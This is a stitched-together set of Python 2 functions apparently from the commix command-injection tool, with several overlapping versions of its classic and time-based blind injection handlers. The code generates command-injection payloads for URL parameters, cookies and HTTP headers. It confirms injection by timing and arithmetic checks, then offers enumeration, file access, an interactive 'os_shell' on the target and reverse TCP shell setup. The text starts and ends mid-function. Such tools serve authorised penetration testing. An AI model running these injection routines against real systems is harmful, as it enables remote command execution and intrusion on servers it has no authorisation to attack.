= session_handler.export_stored_cmd(url, cmd, vuln_parameter) print Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL print "" except KeyboardInterrupt: raise except SystemExit: raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n" pass #break if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def tb_injection_handler(url, timesec, filename, http_request_method, url_time_response): counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False possibly_vulnerable = False false_positive_warning = False export_injection_info = False how_long = 0 injection_type = "blind OS command injection" technique = "time-based command injection technique" if settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " print settings.print_info_msg(info_msg) # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: warn_msg = "The '--url-reload' option is not available in " + technique + "." print settings.print_warning_msg(warn_msg) #whitespace = checks.check_whitespaces() # Calculate all possible combinations total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACE: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # If a previous session is available. how_long_statistic = [] if settings.LOAD_SESSION and session_handler.notification(url, technique, injection_type): try: settings.TIME_BASED_STATE = True cmd = shell = "" url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) checks.check_for_stored_tamper(payload) settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - timesec except TypeError: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "Use the '--flush-session' option." print settings.print_critical_msg(err_msg) raise SystemExit() if settings.RETEST == True: settings.RETEST = False from src.core.injections.results_based.techniques.classic import cb_handler cb_handler.exploitation(url, timesec, filename, http_request_method) if not settings.LOAD_SESSION: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Define alter shell alter_shell = menu.options.alter_shell # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: if alter_shell: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, timesec, http_request_method) else: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision(separator, TAG, output_length, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") print settings.print_payload(payload_msg) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) payload_msg = payload.replace("\n", "\\n") sys.stdout.write(settings.print_payload(payload_msg) + "\n") # Cookie header injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie header injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent HTTP header injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent HTTP header injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer HTTP header injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer HTTP header injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tb_injector.referer_injection_test(url, vuln_parameter, payload) # Host HTTP header injection elif settings.HOST_INJECTION == True: # Check if target host is vulnerable to host HTTP header injection. vuln_parameter = parameters.specify_host_parameter( how_long = tb_injector.host_injection_test(url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) how_long = tb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url) # Statistical analysis in time responses. how_long_statistic.append(how_long) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total * 1.0)),2)) if percent == 100 and no_result == True: if not settings.VERBOSITY_LEVEL >= 1: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : # Time relative false positive fixation. false_positive_fixation = False if len(TAG) == output_length: # Simple statical analysis statistical_anomaly = True if len(set(how_long_statistic[0:5])) == 1: if max(xrange(len(how_long_statistic)), key=lambda x: how_long_statistic[x]) == len(TAG) - 1: statistical_anomaly = False how_long_statistic = [] if timesec <= how_long and not statistical_anomaly: false_positive_fixation = True else: false_positive_warning = True # Identified false positive warning message. if false_positive_warning: warn_msg = "Unexpected time delays have been identified due to unstable " warn_msg += "requests. This behavior may lead to false-positive results.\n" sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) while True: if not menu.options.batch: question_msg = "How do you want to proceed? [(C)ontinue/(s)kip/(q)uit] > " sys.stdout.write(settings.print_question_msg(question_msg)) proceed_option = sys.stdin.readline().replace("\n","").lower() else: proceed_option = "" if len(proceed_option) == 0: proceed_option = "c" if proceed_option.lower() in settings.CHOICE_PROCEED : if proceed_option.lower() == "s": false_positive_fixation = False raise elif proceed_option.lower() == "c": timesec = timesec + 1 false_positive_fixation = True break elif proceed_option.lower() == "q": raise SystemExit() else: err_msg = "'" + proceed_option + "' is not a valid answer." print settings.print_error_msg(err_msg) pass # Check if false positive fixation is True. if false_positive_fixation: false_positive_fixation = False settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - timesec if false_positive_warning: time.sleep(1) randv1 = random.randrange(1, 10) randv2 = random.randrange(1, 10) randvcalc = randv1 + randv2 if settings.TARGET_OS == "win": if alter_shell: cmd = settings.WIN_PYTHON_DIR + "python.exe -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" else: cmd = "powershell.exe -InputFormat none write (" + str(randv1) + " + " + str(randv2) + ")" else: cmd = "expr " + str(randv1) + " %2B " + str(randv2) + "" # Set the original delay time original_how_long = how_long # Check for false positive resutls how_long, output = tb_injector.false_positive_check(separator, TAG, cmd, whitespace, prefix, suffix, timesec, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response) if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : if str(output) == str(randvcalc) and len(TAG) == output_length: possibly_vulnerable = True how_long_statistic = 0 if not settings.VERBOSITY_LEVEL >= 1: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break # False positive else: if not settings.VERBOSITY_LEVEL >= 1: percent = str(float_percent)+ "%" info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue else: if not settings.VERBOSITY_LEVEL >= 1: percent = str(float_percent)+ "%" info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print settings.print_error_msg(err_msg) raise except: percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: if not settings.VERBOSITY_LEVEL >= 1: percent = Fore.RED + "FAILED" + Style.RESET_ALL info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() else: percent = "" else: percent = str(float_percent) + "%" print "" # Print logs notification message logs.logs_notification(filename) #raise else: percent = str(float_percent) + "%" break # Yaw, got shellz! # Do some magic tricks! if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : if (len(TAG) == output_length) and \ (possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level): found = True no_result = False # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True if settings.LOAD_SESSION: possibly_vulnerable = False if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: if not settings.VERBOSITY_LEVEL >= 1: print "" else: checks.total_of_requests() # Print the findings to terminal. success_msg = "The" if len(found_vuln_parameter) > 0 and not "cookie" in header_name : success_msg += " " + http_request_method success_msg += ('', ' (JSON)')[settings.IS_JSON] + ('', ' (SOAP/XML)')[settings.IS_XML] + the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "." print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + str(checks.url_decode(payload)) + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: shell = "" session_handler.injection_point_importation(url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, original_how_long, output_length, is_vulnerable=menu.options.level) #possibly_vulnerable = False else: settings.LOAD_SESSION = False new_line = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = raw_input("\n" + settings.print_question_msg(question_msg)).lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: tb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) print "" break elif enumerate_again in settings.CHOICE_NO: new_line = True break elif enumerate_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.enumeration_options(): tb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: print "" while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline().replace("\n","").lower() else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: tb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) break elif file_access_again in settings.CHOICE_NO: if not new_line: new_line = True break elif file_access_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: # if not menu.enumeration_options() and not menu.options.os_cmd: # print "" tb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Check if defined single cmd. if menu.options.os_cmd: cmd = menu.options.os_cmd check_how_long, output = tb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Export injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) print "" logs.print_logs_notification(filename, url) raise SystemExit() if not new_line : print "" # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace("\n","").lower() else: gotshell = "" if len(gotshell) == 0: gotshell = "y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: if false_positive_warning: warn_msg = "Due to unexpected time delays, it is highly " warn_msg += "recommended to enable the 'reverse_tcp' option.\n" sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) false_positive_warning = False try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE="") if go_back and go_back_again == False: break if go_back and go_back_again: return True else: if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # The main command injection exploitation. check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Export injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, output, vuln_parameter) else: output = session_handler.export_stored_cmd(url, cmd, vuln_parameter) print "\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, output) print "" except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print settings.print_error_msg(err_msg) raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) pass break if no_result == True: if settings.VERBOSITY_LEVEL == 0: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def cb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False injection_type = "Results-based Command Injection" technique = "classic injection technique" if not settings.LOAD_SESSION: sys.stdout.write(settings.INFO_SIGN + "Testing the " + technique + "... ") sys.stdout.flush() if menu.options.verbose: print "" i = 0 # Calculate all possible combinations total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len( settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACES: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # If a previous session is available. if settings.LOAD_SESSION and session_handler.notification( url, technique): url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation( url, http_request_method) else: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join( random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = cb_payloads.decision_alter_shell( separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.decision( separator, TAG, randv1, randv2) # Define prefixes & suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = urllib.unquote(payload) payload = base64.b64encode(payload) else: if separator == " ": payload = re.sub(" ", "%20", payload) else: payload = re.sub(" ", whitespace, payload) # Check if defined "--verbose" option. if menu.options.verbose: print Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) response = cb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) response = cb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) response = cb_injector.referer_injection_test( url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter( settings.INJECT_TAG) response = cb_injector.custom_header_injection_test( url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = cb_injector.injection_test( payload, http_request_method, url) # Evaluate test results. shell = cb_injector.injection_test_results( response, TAG, randvcalc) if not menu.options.verbose: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if shell == False: sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + float_percent + "%" + " ]") sys.stdout.flush() if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent) + "%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent) + "%" sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter( vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not menu.options.verbose and not settings.LOAD_SESSION: print "" # Print the findings to terminal. print Style.BRIGHT + "(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub( "%20", " ", re.sub("%2B", "+", payload)) + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: session_handler.injection_point_importation( url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, delay=0, how_long=0, output_length=0, is_vulnerable="True") else: settings.LOAD_SESSION = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: enumerate_again = raw_input( "\n" + settings.QUESTION_SIGN + "Do you want to enumerate again? [Y/n/q] > " ).lower() if enumerate_again in settings.CHOISE_YES: cb_enumeration.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + settings.ERROR_SIGN + "'" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL + "\n" pass else: if menu.enumeration_options(): cb_enumeration.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) if not menu.file_access_options( ) and not menu.options.os_cmd: print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input( settings.QUESTION_SIGN + "Do you want to access files again? [Y/n/q] > " ).lower() if file_access_again in settings.CHOISE_YES: cb_file_access.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + settings.ERROR_SIGN + "'" + file_access_again + "' is not a valid answer." + Style.RESET_ALL + "\n" pass else: if menu.file_access_options(): if not menu.enumeration_options(): print "" cb_file_access.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) print "" # Check if defined single cmd. if menu.options.os_cmd: if not menu.file_access_options(): print "" cb_enumeration.single_os_cmd_exec( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: if menu.options.verbose: print "" gotshell = raw_input( settings.QUESTION_SIGN + "Do you want a Pseudo-Terminal shell? [Y/n/q] > " ).lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: if not readline_error: # Tab compliter readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower( ) in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options( cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n" elif os_shell_option == "reverse_tcp": settings.REVERSE_TCP = True # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp( ) if settings.REVERSE_TCP == False: continue if settings.REVERSE_TCP == False: continue while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options( settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options( ) result = checks.check_reverse_tcp_options( cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. response = cb_injector.injection( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Evaluate injection results. shell = cb_injector.injection_results( response, TAG) if menu.options.verbose: print "" print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL else: pass else: # Command execution results. response = cb_injector.injection( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # Evaluate injection results. shell = cb_injector.injection_results( response, TAG) shell = "".join( str(p) for p in shell) if not menu.options.ignore_session: session_handler.store_cmd( url, cmd, shell, vuln_parameter) else: shell = session_handler.export_stored_cmd( url, cmd, vuln_parameter) if shell: html_parser = HTMLParser.HTMLParser( ) shell = html_parser.unescape( shell) if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: if menu.options.verbose: print "" print Back.RED + settings.ERROR_SIGN + "The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise except SystemExit: raise elif gotshell in settings.CHOISE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n" pass if no_result == True: print "" return False else: sys.stdout.write("\r") sys.stdout.flush()
def tb_injection_handler(url, delay, filename, http_request_method, url_time_response): percent = 0 counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False injection_type = "Blind-based Command Injection" technique = "time-based injection technique" # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: print Fore.YELLOW + "(^) Warning: The '--url-reload' option is not available in "+ technique +"." + Style.RESET_ALL percent = str(percent)+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Define alter shell alter_shell = menu.options.alter_shell # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: if alter_shell: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method) else: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tb_injector.referer_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total * 1.0)),2)) if percent == 100 and no_result == True: if not menu.options.verbose: percent = 